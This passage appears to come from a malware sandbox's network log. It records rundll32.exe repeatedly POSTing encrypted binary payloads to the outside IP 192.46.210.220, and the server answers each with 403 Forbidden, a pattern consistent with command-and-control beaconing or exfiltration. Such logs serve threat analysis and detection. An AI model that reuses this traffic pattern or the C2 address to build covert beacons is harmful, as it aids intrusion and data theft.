                                                                                                      2021-10-28 03:03:18 UTC214OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:19 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:18 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.449972192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:20 UTC219OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:20 UTC219OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:21 UTC224INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.449976192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:22 UTC224OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:22 UTC224OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:22 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.449980192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:25 UTC229OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:25 UTC229OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:25 UTC234INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.449984192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:27 UTC234OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:27 UTC234OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:27 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.449990192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:29 UTC239OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:29 UTC239OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:29 UTC244INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.450001192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:31 UTC244OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:31 UTC244OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:31 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:31 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.449796192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:59 UTC24OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:01:59 UTC25OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:00 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:00 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      50192.168.2.450012192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:32 UTC249OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:32 UTC249OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:33 UTC254INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:33 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      51192.168.2.450024192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:34 UTC254OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:34 UTC254OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:35 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:35 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      52192.168.2.450034192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:36 UTC259OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:36 UTC259OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:37 UTC264INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:37 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      53192.168.2.450047192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:38 UTC264OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:38 UTC264OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:39 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      54192.168.2.450057192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:40 UTC269OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:40 UTC269OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:41 UTC274INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:41 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      55192.168.2.450066192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:43 UTC274OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
